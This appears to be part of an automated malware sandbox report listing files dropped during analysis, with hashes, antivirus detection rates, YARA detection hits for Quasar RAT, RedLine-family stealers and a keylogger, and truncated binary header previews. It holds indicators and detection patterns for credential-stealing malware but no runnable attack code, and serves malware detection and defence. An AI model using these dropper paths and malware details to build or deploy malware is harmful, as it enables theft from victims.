	6iWK0k820U.exe	Get hash	malicious	RedLine	Browse
	Setup.exe	Get hash	malicious	Laplas Clipper, MicroClip, RedLine	Browse
	Loader.exe	Get hash	malicious	Laplas Clipper, MicroClip, RedLine	Browse

Created / dropped Files

C:\Program Files\Cuis\bon\Bara.exe

Download File

Process:	C:\Users\user\Desktop\GR55Qg1hth.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2479617
Entropy (8bit):	7.887567175274287
Encrypted:	false
SSDEEP:	49152:4elUnBKWqx6g25uMThhswijSEGQpETFkNL:45BKtxo5fQIwuhk
MD5:	B70A5E7260B025E39B8016523A1F2D64
SHA1:	AEA86A6E4D9BA908D9E141A5D4166BA1E3B1B6A7
SHA-256:	FD7327848BB13A7A2919447C1818935482527BCC7DE7DA835B907826B7488490
SHA-512:	A0B63100553D8AE1BBC6471CC0B63499D82FF1503DC17F46CB1AEE07A1332A053C485B74BBE7670638FF0D069496751F9326F9BBB6DF96F794ACB73969B182CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 91%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...W"%c...............$......%................@.............................`&.....B.&...`... ...............................................&......@&......p%..8...........P&.............................@:%.(.....................&.0............................text...(...........................`.P`.data.....!..0....!.................@.`..rdata..0P....%..R....$.............@.`@.pdata...8...p%..:...D%.............@.0@.xdata...1....%..2...~%.............@.0@.bss..........%.......................`..idata........&.......%.............@.0..CRT....x.... &.......%.............@.@..tls.........0&.......%.............@.@..rsrc........@&.......%.............@.0..reloc.......P&.......%.............@.0B........................................................................................................................................................................

C:\ProgramData\mxergolzfguk\kaptsegthwf.exe

Download File

Process:	C:\Users\user\Desktop\gfiKDLgr58thy4d.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2874368
Entropy (8bit):	6.538348251167646
Encrypted:	false
SSDEEP:	49152:NIKC+8eUs/UMBF1XX5QmZLPa16xzqD6Kdaf3DTOWzYuloalhHg4e:NlC+i0bBHXGgjaQx+OhfzTxzdloaD
MD5:	952F360A4651F948BE3A673178631641
SHA1:	60E58B89CFCE587AA121BAF431D55CBBECD21545
SHA-256:	A92133787AF66E6D68A301EF087E4116F5CAB3F538D8EC5E5E0EB95CECC68EA8
SHA-512:	AF346587C95AC9E120CE63D46B22992E3AB69702AF602EA6D7A16C3DCF9D2F7F19903233646CEF8153AA877F5773C486DB504EA6534BCBC3B136BD07B62483D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....L"f.........."..........H+.....@..........@.............................@,...........`.................................................0...<.............,..............0,.x...............................(.......8..............X............................text...f........................... ..`.rdata........... ..................@..@.data...`0+...... +.................@....pdata........,.......+.............@..@.00cfg........,.......+.............@..@.tls......... ,.......+.............@....reloc..x....0,.......+.............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\F4R5fd8grr.exe.log

Download File

Process:	C:\Users\user\Desktop\F4R5fd8grr.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\FA9.tmp

Download File

Process:	C:\Users\user\Desktop\GR55Qg1hth.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	335360
Entropy (8bit):	7.548086611496671
Encrypted:	false
SSDEEP:	6144:RBx7z3Bre16M01nguKBmmlbvx0zKGkl5EiCtuhNjtANJ4tDWhRaitlopYR:RnBreIfKNJVZotuhNZKxrYpI
MD5:	DA87A0A2ABA605908BF8B9A3F4377481
SHA1:	5CAC4EA0B3F0CC2D7C04655DB12AD0443CBAA5CF
SHA-256:	22EE7B8104599B47313195598FFC34AAFD6A6552DCCE0E7B3232CED3A90AC9A4
SHA-512:	55A8A27A013CB2C3DEDA81779D89AB956A5F57D00A155496ABC7BF3C5A87F3B7C41058AB3681CBBD0406F69EA01C4FFC3E5779C2CA676088A68CB87F19C34C28
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Joe Sandbox View:	Filename: Installer.exe, Detection: malicious, Browse Filename: softwareinstaller.exe, Detection: malicious, Browse Filename: N2wufLmC74.exe, Detection: malicious, Browse Filename: setup.exe, Detection: malicious, Browse Filename: hZDPlQwZ9D.exe, Detection: malicious, Browse Filename: cfBJlHsOsz.exe, Detection: malicious, Browse Filename: FKN6uh7y01.exe, Detection: malicious, Browse Filename: 6iWK0k820U.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Loader.exe, Detection: malicious, Browse
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$..........;..eh..eh..eh.fi..eh.`iS.eh..`i..eh..ai..eh..fi..eh.ai..eh.di..eh..dhE.eh^.li..eh^..h..eh...h..eh^.gi..ehRich..eh........PE..d......b.........."..........n......D..........@.............................`............`..................................................e..P...............(............P..d....Q..p............................P..@...............x............................text...0........................... ..`.rdata.............................@..@.data...X....p.......`..............@....pdata..(............l..............@..@_RDATA..\............\|..............@..@.rsrc................~..............@..@.reloc..d....P......................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13yu3qom.gbs.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_35y32sxy.1vg.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aeeoudv1.fuu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajacv5uo.emh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbnbcguj.yv3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hywrsium.3kb.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kokxcc1j.34e.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qaauq3dd.xij.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swzvswjp.h4r.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xdizrlvc.wru.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymmuuy2i.04b.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zg4o5kxo.lpm.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\SubDir\Client.exe

Download File

Process:	C:\Users\user\Desktop\F4R5fd8grr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	514048
Entropy (8bit):	6.158808864589808
Encrypted:	false
SSDEEP:	6144:tTEgdc0YNX7IxUpGREWve13+7LOUs6f6YMZlfdwcEysb8F92tw+gcTR3O:tTEgdfYWxUkQ61yeC3gtLgcdO
MD5:	EA001F076677C9B0DD774AE670EFDF63
SHA1:	37A4466F3C38B60A30FC1073B9D0B2D2D0E692E5
SHA-256:	19FD26FA3F76141CC05EF0C0C96EA91DCF900E760B57195F216A113B1CF69100
SHA-512:	6D634F47C0901E18CB159732C0CA1E7E6C930D16B18D0DAEA717C252EC7DDD37E90745B69512313DBBDAC9099059B6F7CBE07044A71B36231C027818810C8652
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Joe Security Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Florian Roth Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: ditekSHen Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, Author: ditekshen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.^............................~.... ........@.. .......................@............@.................................(...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`.......H.......L................................................................0..M....... ....(.....(...........s....(....(...........s....o....(.....(....s....(........0..8.......(....(.....s....%.o....%.o....%.o....(....&..&...(.............--..........00.......0..@........o....,7(....(.....s....%.o....%.o....%.o....(....&..&...(.............-5..........08......f~....,.~....(....(.....v.(.....s....}.....s....}....r..(......(.....(......(....*....0..L........{....r...po....

C:\Users\user\Desktop\F4R5fd8grr.exe

Download File

Process:	C:\Users\user\Desktop\5fr5gthkjdg71.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	514048
Entropy (8bit):	6.158808864589808
Encrypted:	false
SSDEEP:	6144:tTEgdc0YNX7IxUpGREWve13+7LOUs6f6YMZlfdwcEysb8F92tw+gcTR3O:tTEgdfYWxUkQ61yeC3gtLgcdO
MD5:	EA001F076677C9B0DD774AE670EFDF63
SHA1:	37A4466F3C38B60A30FC1073B9D0B2D2D0E692E5
SHA-256:	19FD26FA3F76141CC05EF0C0C96EA91DCF900E760B57195F216A113B1CF69100
SHA-512:	6D634F47C0901E18CB159732C0CA1E7E6C930D16B18D0DAEA717C252EC7DDD37E90745B69512313DBBDAC9099059B6F7CBE07044A71B36231C027818810C8652
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Joe Security Rule: MAL_QuasarRAT_May19_1, Description: Detects QuasarRAT malware, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Florian Roth Rule: Vermin_Keylogger_Jan18_1, Description: Detects Vermin Keylogger, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: ditekSHen Rule: MALWARE_Win_QuasarStealer, Description: Detects Quasar infostealer, Source: C:\Users\user\Desktop\F4R5fd8grr.exe, Author: ditekshen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k.^............................~.... ........@.. .......................@............@.................................(...S............................ ....................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................`.......H.......L................................................................0..M....... ....(.....(...........s....(....(...........s....o....(.....(....s....(........0..8.......(....(.....s....%.o....%.o....%.o....(....&..&...(.............--..........00.......0..@........o....,7(....(.....s....%.o....%.o....%.o....(....&..&...(.............-5..........08......f~....,.~....(....(.....v.(.....s....}.....s....}....r..(......(.....(......(....*....0..L........{....r...po....

C:\Users\user\Desktop\GR55Qg1hth.exe

Download File

Process:	C:\Users\user\Desktop\5fr5gthkjdg71.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	2479616
Entropy (8bit):	7.887568215394881
Encrypted:	false
SSDEEP:	49152:4elUnBKWqx6g25uMThhswijSEGQpETFkNL:45BKtxo5fQIwuhk
MD5:	8E40252356A6FB3F8F52D1EFFA2C2C3C
SHA1:	3BF5461B591A53DCB48EA2DC6535CD90AA786C4E
SHA-256:	DE83DD82DA3EBAA2C09FD75A7307AD5E2031AD8C911CD75753FFEF3EB1571F0A
SHA-512:	C3286845AA20F9BF06BFBCCB63C12A72ED223FC054881A66B643F55F81AA0DF868C28199090CAB6D37552B268615DC0605587A85F0D4EC6EE6D5ED25A5739A2A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d...W"%c...............$......%................@.............................`&.....B.&...`... ...............................................&......@&......p%..8...........P&.............................@:%.(.....................&.0............................text...(...........................`.P`.data.....!..0....!.................@.`..rdata..0P....%..R....$.............@.`@.pdata...8...p%..:...D%.............@.0@.xdata...1....%..2...~%.............@.0@.bss..........%.......................`..idata........&.......%.............@.0..CRT....x.... &.......%.............@.@..tls.........0&.......%.............@.@..rsrc........@&.......%.............@.0..reloc.......P&.......%.............@.0B........................................................................................................................................................................

C:\Users\user\Desktop\gfiKDLgr58thy4d.exe

Download File

Process:	C:\Users\user\Desktop\5fr5gthkjdg71.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2874368
Entropy (8bit):	6.538348251167646
Encrypted:	false
SSDEEP:	49152:NIKC+8eUs/UMBF1XX5QmZLPa16xzqD6Kdaf3DTOWzYuloalhHg4e:NlC+i0bBHXGgjaQx+OhfzTxzdloaD
MD5:	952F360A4651F948BE3A673178631641
SHA1:	60E58B89CFCE587AA121BAF431D55CBBECD21545
SHA-256:	A92133787AF66E6D68A301EF087E4116F5CAB3F538D8EC5E5E0EB95CECC68EA8
SHA-512:	AF346587C95AC9E120CE63D46B22992E3AB69702AF602EA6D7A16C3DCF9D2F7F19903233646CEF8153AA877F5773C486DB504EA6534BCBC3B136BD07B62483D0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 92%
Preview:	MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d....L"f.........."..........H+.....@..........@.............................@,...........`.................................................0...<.............,..............0,.x...............................(.......8..............X............................text...f........................... ..`.rdata........... ..................@..@.data...`0+...... +.................@....pdata........,.......+.............@..@.00cfg........,.......+.............@..@.tls......... ,.......+.............@....reloc..x....0,.......+.............@..B................................................................................................................................................................................................................................................................................................................................................

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllulpl/lz:NllUpl/
MD5:	DFE4744F578FF94A0B3378C24D7C626F
SHA1:	7A733F5674EA7740F3C3BBD286B40868D923E771
SHA-256:	507F96B627FC9392C8F926A2CCA0AC78618D26FAAFDF2C08121E2CEAA7097AC1
SHA-512:	418A50E5C3ACF50D8307707E98E1DA726B3F56903A077ADA8A3E631FE97AF6310384517C9E66C6E6ADE8F0E34D08558C62AA0082AFF674136CE86C25C5C7DE30
Malicious:	false
Preview:	@...e................................................@..........

C:\Windows\Temp\__PSScriptPolicyTest_axluvaqo.m4s.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_ig153dk2.uc5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_lpsfq3tr.vnr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
